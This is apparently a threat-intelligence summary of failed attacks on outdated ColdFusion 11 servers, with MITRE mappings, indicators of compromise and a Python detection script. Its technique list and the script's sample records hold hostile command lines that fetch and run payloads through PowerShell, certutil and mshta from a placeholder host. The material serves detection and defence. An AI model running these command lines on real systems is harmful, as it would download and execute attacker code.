Threat actors targeted obsolete ColdFusion 11 servers to gain access and pivot to deploying ransomware built from leaked LockBit 3.0 code, but Sophos blocked every attempt on a customer network. Telemetry ties the activity to a threat actor calling itself BlackDogs 2023, who repeatedly tried PowerShell, certutil, and HTA delivery vectors to deploy a Cobalt Strike beacon and failed each time.
Keypoints
- Threat actors exploited unpatched ColdFusion 11 servers to gain initial access and pivot within the network, with no successful deployments observed.
- Payloads under consideration included Cobalt Strike beacons, ransomware (linked to leaked LockBit 3.0 code), fileless PowerShell backdoors, miners, and webshells.
- Sophos endpoint detections blocked every attempt, including LOLBin process launches and beacon deployments.
- Telemetry linked the activity to a single actor/group using the alias “BlackDogs 2023,” who left artifacts in a repository hosting their tools and payloads.
- The attackers used multiple delivery methods (PowerShell, certutil, HTA, and command-line scripts) and tested connectivity to remote domains (oastify subdomains) to gauge exploit viability.
- The operation underscores the risk of running old, unsupported software (ColdFusion 11) and the need for network isolation and credential restrictions on exposed servers.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attacker attempted to leverage vulnerabilities in obsolete ColdFusion 11 to access Windows servers; “to test whether they could exploit the server further with a series of command-line entries leveraged the ColdFusion Server processes.”
- [T1059.001] PowerShell – Remote PowerShell script to download and deploy a Cobalt Strike beacon; “powershell -nop -exec bypass -c …”
- [T1105] Ingress Tool Transfer – Downloading and executing payloads via web requests (e.g., “downloadstring(‘hxxp://:64/watchdogs.ps1’)”).
- [T1218.005] Mshta – Using HTA to initiate PowerShell and download payloads; “mshta hxxp://:64/evil.hta”
- [T1059.003] Windows Command Shell – Repeated use of cmd /c commands to test connectivity and deploy payloads; “cmd /c …” statements
- [T1027] Obfuscated/Compressed Files and Information – Attempting to load and execute encoded payloads in memory (e.g., “FromBase64String” payloads).
- [T1071.001] Web Protocols – Cobalt Strike beacon communication and related C2 activity over web protocols (noted as C2_10a in telemetry).
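The technique list above maps cleanly onto process-creation telemetry. As an added example (not code from the Sophos report), the rules below score constructed process-creation records against the delivery vectors described: a shell spawned by the ColdFusion service, a PowerShell download cradle, certutil and mshta fetches, base64 in-memory loading, and oastify.com probes. The record field names, the coldfusion.exe parent image path and the 198.51.100.10:64 host (standing in for the report's redacted download server) are assumptions.

```python
import re
from ntpath import basename

# Constructed process-creation records modelled on the report's command lines.
# Field names are an assumption, not Sophos telemetry format; 198.51.100.10:64
# is a placeholder for the redacted download host in the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\ColdFusion11\cfusion\bin\coldfusion.exe",   # assumed CF11 service image
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c nslookup mc2a1coghq275g3y1qhnp5u2otukid62.oastify.com"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.10:64/watchdogs.ps1')\""},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.51.100.10:64/evil.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.10:64/ftps.exe ftps.exe"},
    {"parent": r"C:\Windows\explorer.exe",                      # benign control record
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Logs"},
]

def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return basename(path).lower()

# Each rule: (label, predicate over one record). Labels carry the ATT&CK id.
RULES = [
    ("T1190 web-app process spawning a shell",
     lambda e: "coldfusion" in image_name(e["parent"])
               and image_name(e["image"]) in {"cmd.exe", "powershell.exe"}),
    ("T1059.001/T1105 PowerShell download cradle",
     lambda e: image_name(e["image"]) == "powershell.exe"
               and re.search(r"-(nop|noprofile|exec\s+bypass|ep\s+bypass)\b", e["cmdline"], re.I)
               and re.search(r"download(string|file)|iex|invoke-expression", e["cmdline"], re.I)),
    ("T1105 certutil URL fetch",
     lambda e: image_name(e["image"]) == "certutil.exe"
               and re.search(r"-urlcache", e["cmdline"], re.I)),
    ("T1218.005 mshta loading a remote HTA",
     lambda e: image_name(e["image"]) == "mshta.exe"
               and re.search(r"https?://", e["cmdline"], re.I)),
    ("T1027 base64 payload decoded in memory",
     lambda e: re.search(r"FromBase64String", e["cmdline"], re.I) is not None),
    ("oastify.com connectivity probe",
     lambda e: re.search(r"[a-z0-9]+\.oastify\.com", e["cmdline"], re.I) is not None),
]

def classify(events):
    """Return, per record, the labels of every rule it triggers (empty list = no hit)."""
    return [[label for label, hit in RULES if hit(e)] for e in events]

if __name__ == "__main__":
    for e, hits in zip(SAMPLE_EVENTS, classify(SAMPLE_EVENTS)):
        print(hits or ["no hit"], "<-", e["cmdline"][:60])
```

Hits that combine a web-server parent with a LOLBin child (the first record fires two rules) are the ones worth paging on; the single-rule certutil or mshta hits are noisier on a general fleet but not on an isolated ColdFusion host.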
Indicators of Compromise
- [Domain] Telemetry-related domains – oastify.com and several subdomains used for testing remote connectivity (e.g., mc2a1coghq275g3y1qhnp5u2otukid62.oastify.com, oh9c6etims79ai806smpu7z4tvzmnhb6.oastify.com)
- [Hash] Watchdogs.ps1 – a77fd996290cb37b7368f0b54774d8977c97fb7c
- [Hash] Invoke-powershelltcp.ps1 – 6be4f82c2f5dc46ebfa74a77fb550448fcac12d5
- [Hash] OftenExcute.ps1 – b2d5c047e60b2a183d30ac92b1dc73ac5ba58bbe
- [Hash] Memorystream payload (base64-in-memory load) – 48c62e2b8e99ba7ebdaa50da7b84de014122f8eb
- [Hash] ftps.exe – c2e896570e194ee4003f9e696a97c04b64a6e14e
- [Hash] LKl23s.exe – 759b9d1ea843596ab32ad401ffa1c9d09e735b56
- [Hash] Ww3wb.exe – a543ea56ecc63ec35e925e79d7c51558557b3ed1